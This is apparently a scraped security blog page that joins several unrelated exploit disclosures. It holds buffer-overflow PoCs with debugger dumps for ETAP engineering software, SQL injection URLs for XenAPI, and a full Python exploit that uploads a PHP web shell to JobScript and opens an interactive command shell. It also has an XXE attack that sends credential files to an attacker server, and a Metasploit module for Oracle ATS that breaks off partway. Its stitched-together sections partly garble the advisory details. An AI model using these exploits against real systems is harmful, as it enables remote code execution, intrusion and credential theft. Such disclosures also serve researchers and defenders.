Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities
Vendor: Operation Technology, Inc.
Product web page: http://www.etap.com
Affected version: 14.1.0.0
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
is the most comprehensive electrical engineering software platform for the
design, simulation, operation, and automation of generation, transmission,
distribution, and industrial systems. As a fully integrated model-driven
enterprise solution, ETAP extends from modeling to operation to offer a
Real-Time Power Management System.
Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow
vulnerability because the application fails to handle malformed arguments.
An attacker can exploit these issues to execute arbitrary code within the
context of the application or to trigger a denial-of-service conditions.
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5324
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php
07.04.2016
--
Confirmed vulnerable binaries:
------------------------------
acsdvd.exe
ca.exe
csdvd.exe
DBExtractConsoleApp.exe
dccalc.exe
etarcgis.exe
etarcgis92.exe
etarcgis93.exe
ETArcGIS_TD.exe
ETArcGIS_TD10.exe
etcabp.exe
etcp.exe
etgrd.exe
ETPanelRep.exe
ET_CATIA.exe
et_ieee.exe
harmonic.exe
LA3PH.exe
LF3PH.exe
lffd.exe
lfgs.exe
lfle.exe
lfnr.exe
ms.exe
OCP.exe
opf.exe
OtiMongoConvert.exe
PlotCompare64.exe
ra.exe
SC3Ph.exe
scansi1p.exe
scansi3p.exe
SCGost1p.exe
sciec1p.exe
sciec3p.exe
sciectr.exe
scsource.exe
SFA.exe
so3ph.exe
stlf.exe
svc.exe
TDULF.exe
ts.exe
uc.exe
PoCs:
-----
[vuln binary] [>256 bytes as arg]
===================================
C:\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(281c.202c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe
eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb
eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
etcp+0x7f38:
00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341
0:000> !exchain
0018ff3c: etcp+10041 (00410041)
Invalid exception stack at 00410041
===================================
C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.String.wcslen(Char* ptr)
at System.String.CtorCharPtr(Char* ptr)
at wmain(Int32 argc, Char** argv, Char** envp)
at wmainCRTStartup()
(3a98.1e20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
mscorlib_ni+0x48f380:
000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????
0:000> d rdi
00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.
00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
C:\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe -
eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000
eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ra!CFileMap::operator=+0x786:
00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341
0:000> !exchain
0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)
Invalid exception stack at 00410041
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786
0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f
0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2
0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
..
0:000> d esi
005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . .
005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe -
kernel32!GetProfileStringW+0x12cc9:
75150265 cc int 3
===============================
C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(380c.3cc4): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for SO3Ph.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe -
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
0:000> r
rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000
rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002
rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000
r14=000000000012eb00 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
===============================
C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(36bc.36b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll -
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> r
rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000
rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0
rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000
r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> d rax
00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
...
0:000> r
rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff
rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1
rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000
r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
KERNELBASE!lstrlenW+0x17:
000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]
===============================
COM/ActiveX PoCs:
-----------------
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let Name As String"
memberName = "Name"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1000, "A")
target.Name = arg1
</script>
</html>
(2750.243c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll -
eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684
eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
iPlotLibrary!DllUnregisterServer+0x104e5a:
0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????
0:000> d edx
02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
===============================
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let MenuItemCaptionValueY As String"
memberName = "MenuItemCaptionValueY"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1044, "A")
target.MenuItemCaptionValueY = arg1
</script>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863287229
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: XenAPI for XenForo
Vendor URL: github.com/Contex/XenAPI
Type: SQL Injection [CWE-89]
Date found: 2016-05-20
Date published: 2016-05-23
CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
XenAPI for XenForo v1.4.1
older versions may be affected too but were not tested.
4. INTRODUCTION
===============
This Open Source REST API allows usage of several of XenForo's functions,
such as authentication, user information and many other functions!
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The plugin "XenAPI" for XenForo offers a REST Api with different functions
to query and edit information from the XenForo database backend. Amongst
those are "getGroup" and "getUsers", which can be called without
authentication (default) and since the application does not properly
validate and sanitize the "value" parameter, it is possible to inject
arbitrary SQL commands into the XenForo backend database.
The following proof-of-concepts exploit each vulnerable REST action
and extract the hostname of the server:
https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
6. RISK
=======
The vulnerability allows remote attackers to read sensitive information
from the XenForo database like usernames and passwords. Since the affected
REST actions do not require an authentication hash, these vulnerabilities
can be exploited by an unauthenticated attacker.
7. SOLUTION
===========
Update to the latest version v1.4.2
8. REPORT TIMELINE
==================
2016-05-20: Discovery of the vulnerability
2016-05-20: Notified vendor via contact address
2016-05-20: Vendor provides update for both issues
2016-05-21: Provided update fixes the reported issues
2016-05-21: Vendor publishes update
2016-05-23: Advisory released
9. REFERENCES
=============
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
#!C:/Python27/python.exe -u
#
#
# JobScript Remote Code Execution Exploit
#
#
# Vendor: Jobscript
# Product web page: http://www.jobscript.in
# Affected version: Unknown
#
# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL
# database. It's a complete job script for those who wants to start a professional
# job portal website like naukri.com, monster.com, clickjobs.com or any such major
# job portals. Jobscript was designed and developed with the following features like
# control panel for Employer's and also for Job Seeker's, email alerts, job search,
# online resume, payment and membership plans.
#
# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The
# vulnerability is caused due to the improper verification of uploaded files in
# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can
# be exploited to execute arbitrary PHP code by uploading a malicious PHP script
# file with '.php' extension (to bypass the '.htaccess' block rule) that will be
# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory.
#
# Tested on: Apache 2.4.9
# PHP 5.4.26
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5322
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php
#
#
# 31.03.2016
#
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import os, time, re, requests, httplib
from cStringIO import StringIO
from urllib2 import URLError
global file, file1
file = ';nonce'
file1 = '"security"'
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
prelogin = opener2.open('http://'+host+'/jobmonster/member-2/')
output = prelogin.read()
for line in output.splitlines():
if file1 in line:
security = str(line.split("=")[4:])[3:13]
break
print 'Login please.'
username = raw_input('Enter username: ')
password = raw_input('Enter password: ')
login_data = urllib.urlencode({
'action' : 'noo_ajax_login',
'log' : username,
'pwd' : password,
'remember' : 'false',
'security' : security,
'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1'
})
login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data)
auth = login.read()
if re.search(r'false', auth):
print 'Incorrect username or password'
sys.exit()
else:
print 'Authenticated'
response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1')
response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general')
output = response.read()
for line in output.splitlines():
if file in line:
nonce = str(line.split("=")[3:])[28:38]
headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'}
body = """-----------------------------51402178812572
Content-Disposition: form-data; name="name"
RCE.php
-----------------------------51402178812572
Content-Disposition: form-data; name="file"; filename="RCE.php"
Content-Type: application/pdf
<?php
system($_GET['cmd']);
?>
-----------------------------51402178812572--"""
response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj)
raw_input()
while True:
try:
cmd = raw_input('shell@'+host+':~# ')
execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd))
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
1. ADVISORY INFORMATION
========================================
Title: AfterLogic WebMail Pro ASP.NET Administrator Account Takover via XXE
Injection
Application: AfterLogic WebMail Pro ASP.NET
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: AfterLogic WebMail Pro ASP.NET < 6.2.7
Vendor URL: http://www.afterlogic.com/webmail-client-asp-net
Bugs: XXE Injection
Date of found: 28.03.2016
Reported: 22.05.2016
Vendor response: 22.05.2016
Date of Public Advisory: 23.05.2016
Author: Mehmet Ince
2. CREDIT
========================================
This vulnerability was identified during penetration test
by Mehmet INCE & Halit Alptekin from PRODAFT / INVICTUS
3. VERSIONS AFFECTED
========================================
AfterLogic WebMail Pro ASP.NET < 6.2.7
4. INTRODUCTION
========================================
It seems that /webmail/spellcheck.aspx?xml= endpoint takes XML request as
an parameter and parse it with XML entities.
By abusing XML entities attackers can read Web.config file as well as
settings.xml that contains administrator account
credentials in plain-text.
5. TECHNICAL DETAILS & POC
========================================
1 - Put following XML entity definition into your attacker server. E.g:
/var/www/html/test.dtd. Do NOT forget to change ATTACKER_SERVER_IP.
<!ENTITY % payl SYSTEM
"file://c:/inetpub/wwwroot/apps/webmail/app_data/settings/settings.xml">
<!ENTITY % int "<!ENTITY % trick SYSTEM '
http://ATTACKER_SERVER_IP/?p=%payl;'>">
2 - Start reading access log on your attacker server.
tail -f /var/log/apache/access.log
3 - Send following HTTP GET request to the target.
http://TARGET_DOMAIN/webmail/spellcheck.aspx?xml=<?xml version="1.0"
encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://81.17.25.9/test.dtd">
%remote;
%int;
%trick;]>
4 - You will see the settings.xml content in your access log.
5 - In order to decode and see it in pretty format. Please follow
instruction in order.
5.1 - Create urldecode alias by executing following command.
alias urldecode='python -c "import sys, urllib as ul; \
print ul.unquote_plus(sys.argv[1])"'
5.2 - Get last line of access log and pass it to the urldecode.
root@hacker:/var/www/html# urldecode $(tail -n 1
/var/log/apache2/access.log|awk {'print $7'})
/?p=
<Settings>
<Common>
<SiteName>[SITE_NAME_WILL_BE_HERE]</SiteName>
<LicenseKey>[LICENSE_KEY]/LicenseKey>
<AdminLogin>[ADMINISTRATOR_USERNAME]</AdminLogin>
<AdminPassword>[ADMINISTRATOR_PASSWORD]</AdminPassword>
<DBType>MSSQL</DBType>
<DBLogin>WebMailUser</DBLogin>
<DBPassword>[DATABASE_PASSWORD]</DBPassword>
<DBName>Webmail</DBName>
<DBDSN>
</DBDSN>
<DBHost>localhost\SQLEXPRESS</DBHost>
....
....
...
6 - You can login by using these administration credentials.
Login panel is located at http://TARGET_DOMAIN/webmail/adminpanel/
6. RISK
========================================
The vulnerability allows remote attackers to read sensitive information
from the server such as settings.xml or web.config which contains
administrator
account and database credentials.
7. SOLUTION
========================================
Update to the latest version v1.4.2
8. REPORT TIMELINE
========================================
28.03.2016: Vulnerability discovered during pentest
29.03.2016: Our client requested a time to mitigate their infrastructures
22.05.2016: First contact with vendor
22.05.2016: Vendor requested more technical details.
23.05.2016: Vendor publishes update with 6.2.7 release.
23.05.2016: Advisory released
9. REFERENCES
========================================
https://twitter.com/afterlogic/status/734764320165400576
--
Sr. Information Security Engineer
https://www.mehmetince.net
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle ATS Arbitrary File Upload',
'Description' => %q{
This module exploits an authentication bypass and arbitrary file upload
in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
unknown earlier versions, to upload and execute a JSP shell.
},
'Author' => [
'Zhou Yu', # Proof of concept
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-0492}, # Auth bypass
%w{CVE 2016-0491}, # File upload
%w{EDB 39691} # PoC
],
'DisclosureDate' => 'Jan 20 2016',
'License' => MSF_LICENSE,
'Platform' => %w{win linux},
'Arch' => ARCH_JAVA,
'Privileged' => true,
'Targets' => [
['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'],
['OATS <= 12.4.0.2.0 (Linux)', 'Platform' => 'linux']
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8088)
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/admin/Login.do'
)
